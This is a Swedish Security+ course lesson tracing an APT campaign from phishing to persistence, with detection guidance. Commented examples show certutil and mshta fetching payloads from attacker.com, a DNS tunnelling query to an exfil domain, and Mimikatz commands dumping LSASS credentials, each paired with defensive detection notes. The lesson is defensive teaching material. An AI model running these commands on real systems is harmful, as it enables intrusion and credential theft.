Security+ Academy · Lektion

APT-livscykeln: från initial åtkomst till beständighet

Följ en APT från initial åtkomst via riktat nätfiske genom etablering av C2, privilegieeskalering och beständighetsmekanismer som överlever omstarter och ominstallationer.

Lektion 1 av 413 steg

APT-livscykeln: från initial åtkomst till beständighet är en gratis lektion i Security+ Academy på CoddyKit. Detta är lektion 1 av 4. Du kan läsa vilka 3 lektioner som helst i den här lärvägen kostnadsfritt i sin helhet – därefter låser CoddyKit PRO upp alla lektioner, plus praktisk övning med en inbyggd kodredigerare och en AI-lärare dygnet runt. Den ingår i lärvägen för Security+ Academy, och Era framsteg synkroniseras mellan webben och CoddyKit-appen. Kursen i Security+ Academy innehåller totalt 4 lektioner.

Vad är ett avancerat persistent hot?

Ett Advanced Persistent Threat (APT) är en sofistikerad, långvarig cyberattackskampanj som vanligtvis genomförs av statsunderstödda aktörer eller välfinansierade kriminella grupper med specifika strategiska mål. De tre kännetecknen är: Advanced – använder anpassad skadlig kod, zero-day-sårbarheter och nya tekniker; Persistent – upprätthåller en dold närvaro i månader eller år och genomför alltså inte en snabb attack; Threat – är en samordnad och riktad attack mot en specifik organisation. Kända APT-grupper är bland andra APT28 (Fancy Bear), som kopplas till Rysslands GRU, APT41, som kopplas till Kina, och Lazarus Group, som kopplas till Nordkorea.

Initial åtkomst: Så tar sig APT-grupper in

APT-kampanjer börjar vanligtvis med någon av ett fåtal beprövade tekniker för initial åtkomst. Riktad nätfiskeattack med beväpnade bilagor eller länkar som samlar in autentiseringsuppgifter är den vanligaste metoden – e-postmeddelandet ser ut att komma från en betrodd kollega eller partner. Angrepp mot leveranskedjan (som i SolarWinds/SUNBURST) bäddar in skadlig kod i betrodda programuppdateringar. Utnyttjande av internetexponerade tjänster (VPN-enheter, Exchange-servrar och webbapplikationer) genom opatchade CVE-sårbarheter. Vid vattenhålsattacker angrips webbplatser som ofta besöks av målorganisationens medarbetare, och drive-by-angrepp levereras till besökarna.

Körning: Köra den första nyttolasten

Efter att ha fått initial åtkomst måste angriparen köra sin första nyttolast på målsystemet. APT-grupper föredrar tekniker som smälter in i normal systemaktivitet: skadliga makron i Office-dokument som körs när offret aktiverar innehållet; HTML Application-filer (HTA) som kör skript när de öppnas; Living-off-the-Land Binaries (LOLBins) – användning av legitima Windows-verktyg som mshta.exe, certutil.exe, regsvr32.exe eller wscript.exe för att köra angriparkod och kringgå listor över tillåtna applikationer. Dessa tekniker gör det svårt att skilja den första nyttolasten från legitim systemaktivitet.

# Example LOLBin abuse: certutil used to download payload
# certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe

# Example: mshta executing remote HTA
# mshta.exe http://attacker.com/malicious.hta

# Detection: alert on certutil/mshta with network connections

C2-etablering: Ringa hem

När den första nyttolasten har körts upprättar den en Command and Control-kanal (C2) tillbaka till angriparens infrastruktur. Moderna APT-aktörer använder C2-tekniker som är utformade för att undgå upptäckt: HTTPS till lookalike-domäner som efterliknar legitima molntjänster (Teams, OneDrive, GitHub); DNS-tunnling – kommandon kodas i DNS-frågor efter TXT-poster som ser ut som normal DNS-trafik; Domain Generation Algorithms (DGA) som varje dag skapar en ny C2-domän utifrån ett startvärde, vilket gör blockering av domäner ineffektiv; samt C2 enligt principen living-off-the-land, där legitima molnplattformar (Slack API, Google Sheets, Twitter) används som kommunikationskanal.

# DNS tunneling detection: look for unusually long DNS queries
# Normal DNS query: www.google.com (13 chars)
# DNS tunnel query: 4f72d3a1b9c2e5f8.exfil.attacker.com (38 chars of encoded data)

# Zeek/Bro detection rule concept:
# alert dns (dns.qname length > 50)

Kartläggning: Kartlägga miljön

Efter att C2 har etablerats genomför APT-aktörer intern rekognosering för att förstå miljön innan de går vidare. Detta omfattar: uppräkning av Active Directory med verktyg som BloodHound för att kartlägga förtroenderelationer och identifiera värdefulla mål; nätverksskanning för att identifiera aktiva värdar, tjänster och öppna portar; identifiering av autentiseringsuppgifter genom att söka i filsystem efter konfigurationsfiler, lösenordsdatabaser eller autentiseringsuppgifter som lagras i webbläsare; samt identitetsuppräkning för att identifiera privilegierade konton, tjänstekonton och administratörers arbetsstationer. Merparten av kartläggningen använder inbyggda Windows-verktyg (net user /domain, ipconfig, nltest) för att undvika upptäckt.

# Native Windows commands used by APTs for discovery
# net user /domain                    # list domain users
# net group 'Domain Admins' /domain   # list domain admins
# ipconfig /all                       # network configuration
# netstat -ano                        # active network connections
# tasklist /v                         # running processes

Privilegiereskalering: Skaffa administratörsbehörighet

APT-grupper får vanligtvis initial åtkomst med begränsade användarautentiseringsuppgifter och måste eskalera privilegier för att uppnå sina mål. Vanliga vägar för eskalering är: stöld av autentiseringsuppgifter från minnet med Mimikatz (extrahering av NTLM-hashar från LSASS-processens minne); Kerberoasting (begäran av tjänstebiljetter för tjänstekonton och knäckning av dem offline); utnyttjande av felkonfigurerade tjänster med svaga behörigheter (osäkra sökvägar till tjänstbinärer, DLL-kapning); samt tokenimpersonering för att stjäla autentiseringstokenen från en privilegierad process. Tekniker för att kringgå User Account Control (UAC) gör det möjligt att gå från standardadministratör till SYSTEM utan att en UAC-prompt visas.

# Mimikatz: dump credentials from LSASS memory
# (defender perspective - what attackers run)
# privilege::debug
# sekurlsa::logonpasswords

# Detection: alert on LSASS memory reads by non-system processes
# Windows Event ID 4656/4663: access to LSASS process

Mekanismer för beständighet: Överleva omstarter

APT-grupper investerar mycket i mekanismer för beständighet som överlever omstarter och ominstallationer, eftersom den initiala åtkomsten kan ha varit svår och kostsam att uppnå. Vanliga Windows-tekniker för beständighet är: Registry Run Keys (HKLM\Software\Microsoft\Windows\CurrentVersion\Run); Scheduled Tasks som kör skadlig kod enligt ett schema; Windows Services som startas automatiskt; WMI Event Subscriptions (svåra att upptäcka och överlever de flesta rensningsförsök); DLL Search Order Hijacking; samt Boot/Pre-OS-implantat (UEFI-implantat som överlever ominstallationer av operativsystemet och har använts av Equation Group och aktörer med koppling till NSA).

# Common persistence locations to monitor
# Registry:
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# HKLM\System\CurrentControlSet\Services

# Check scheduled tasks for suspicious entries
# schtasks /query /fo LIST /v | findstr 'Task Name\|Run As User\|Task To Run'

Försvarsevasion: Att gömma sig i det öppna

APT-aktörer använder omfattande försvarsevasion för att undvika upptäckt av säkerhetsverktyg för slutpunkter och analytiker. Teknikerna omfattar: processinjektering — skadlig kod injiceras i legitima processer som explorer.exe eller svchost.exe, så att skadlig programvara körs under ett betrott processnamn; timestomping — filers tidsstämplar ändras så att skadliga filer ser ut att ha funnits i flera år; radering och manipulering av loggar — Windows-händelseloggar rensas för att ta bort bevis; missbruk av kodsigneringscertifikat — skadlig programvara signeras med stulna legitima certifikat; samt körning i minnet (fillös skadlig programvara), som aldrig skrivs till disken där filbaserade antivirusprogram skulle upptäcka den.

Exfiltrering: Att stjäla data i hemlighet

APT-aktörer hanterar dataexfiltrering noggrant för att undvika att utlösa DLP-kontroller och upptäckt av avvikelser i bandbreddsanvändningen. Teknikerna omfattar: datainsamling inför exfiltrering — riktad data samlas i ett krypterat arkiv innan den exfiltreras i små delar under flera dagar; HTTPS-exfiltrering till molnlagringstjänster (OneDrive, Dropbox) som tillåts av företagets brandväggsregler; steganografi — data göms i bildfiler; samt tidsbaserad exfiltrering under arbetstid för att smälta in i legitim trafik. APT-aktörer exfiltrerar endast det de behöver (värdefull immateriell egendom, inloggningsuppgifter och strategiska planer) i stället för att kopiera allt i stora mängder — vilket minimerar deras avtryck och sannolikheten för upptäckt.

Upptäcka APT-aktivitet: Viktiga indikatorer

APT-upptäckt kräver att man ser bortom enskilda aviseringar för att identifiera mönster av relaterad aktivitet genom hela attackkedjan. Viktiga indikatorer omfattar: ovanliga relationer mellan överordnade och underordnade processer (t.ex. Word som startar PowerShell); kodade PowerShell-kommandon eller nedladdningar från internet; schemalagda aktiviteter eller tjänster som skapas vid ovanliga tidpunkter; åtkomst till LSASS-minnet från processer som inte är systemprocesser; lateral förflyttning via SMB eller WMI från arbetsstationer; samt ovanliga utgående DNS-frågor med långa underdomännamn. MITRE ATT&CK Navigator gör det möjligt för försvarare att koppla upptäckta tekniker till ATT&CK-matrisen och identifiera luckor i sin täckning av detektering.

# Splunk query: detect PowerShell encoded command execution
# index=windows source=WinEventLog:Security EventCode=4688
# | search NewProcessName='*powershell*' CommandLine='*-enc*'
# | table _time, ComputerName, SubjectUserName, CommandLine

APT-hantering: Begränsa hotet utan att avslöja sig

Hantering av en pågående APT kräver en noggrann avvägning: begränsa hotet utan att varna angriparen. För tidiga begränsningsåtgärder (blockering av C2-trafik, inaktivering av konton) kan få APT-aktören att aktivera destruktiva nyttolaster eller påskynda exfiltreringen. Bästa praxis omfattar: diskret övervakning medan underrättelser samlas in; gradvis segmentering av infekterade värdar med brandväggsregler utan att blockera C2; införande av deception-teknik (honeytokens, canary-konton) för att övervaka angriparens aktivitet; samt samordning med brottsbekämpande myndigheter före större begränsningsåtgärder. En fullständig sanering kräver att alla mekanismer för beständighet och komprometterade konton identifieras — en enda missad implantat innebär att angriparen återkommer.

Snabbtest

Testa er förståelse av koncepten i CompTIA Security+ (SY0-701) från den här lektionen.

Lektionssammanfattning

I den här lektionen har ni lärt er att: APT:er är avancerade, långvariga och målinriktade kampanjer som vanligtvis pågår i flera månader och använder riktat nätfiske, leveranskedjeattacker eller utnyttjande av sårbarheter för att få initial åtkomst, att APT:er använder LOLBins och legitima molntjänster för C2 för att smälta in i normal trafik och undvika upptäckt, samt att mekanismer för beständighet sträcker sig från Registry Run Keys till UEFI-firmwareimplantat — där WMI-prenumerationer är särskilt svåra att upptäcka och åtgärda. Härnäst utforskar vi tekniker för lateral förflyttning, bland annat Pass-the-Hash och Pass-the-Ticket.

Gratis att börja

Lär dig Security+ Academy med en AI-lärare – gratis

Skriv och kör riktig kod i webbläsaren, få omedelbar hjälp av en AI-lärare dygnet runt och fortsätt där du slutade – på webben eller i appen.

Kurser
30
Lektioner
120

Vanliga frågor

Är lektionen ”APT-livscykeln: från initial åtkomst till beständighet” gratis?

Ja – du kan läsa vilka 3 lektioner som helst i lärvägen Security+ Academy, inklusive ”APT-livscykeln: från initial åtkomst till beständighet”, kostnadsfritt i sin helhet här på webben. Därefter låser CoddyKit PRO upp alla lektioner, plus interaktiv övning med en inbyggd kodredigerare och en AI-lärare dygnet runt. Kursen i Security+ Academy innehåller totalt 4 lektioner.

Vad lär jag mig i ”APT-livscykeln: från initial åtkomst till beständighet”?

Följ en APT från initial åtkomst via riktat nätfiske genom etablering av C2, privilegieeskalering och beständighetsmekanismer som överlever omstarter och ominstallationer. Ni övar på Security+ Academy med praktisk kod som körs direkt i webbläsaren, medan en AI-handledare som är tillgänglig dygnet runt svarar på Era frågor under lektionen.

Behöver jag någon erfarenhet för att börja lära mig Security+ Academy?

Du behöver inga förkunskaper. Utbildningen i Security+ Academy på CoddyKit är upplagd för allt från nybörjare till avancerade elever, så att du kan börja här eller från början och gå fram i din egen takt. Detta är lektion 1 av 4.

Hur lång tid tar lektionen ”APT-livscykeln: från initial åtkomst till beständighet”?

De flesta CoddyKit-lektioner tar cirka 5–10 minuter. Varje lektion är kort och interaktiv, så att du gör stadiga framsteg och kan fortsätta precis där du slutade – på webben eller i appen.

Kan jag skriva och köra kod i den här Security+ Academy-lektionen?

Ja. Varje Security+ Academy-lektion innehåller en inbyggd kodredigerare, så att du kan skriva och köra riktig kod direkt i webbläsaren och få omedelbar AI-feedback – utan lokal installation.

Alla lektioner i den här kursen

  1. APT-livscykeln: från initial åtkomst till beständighet
  2. Lateral förflyttning: Pass-the-Hash och Pass-the-Ticket
  3. Kerberoasting- och Golden Ticket-attacker
  4. MITRE ATT&CK-ramverket för detektering och incidenthantering
← Tillbaka till Security+ Academy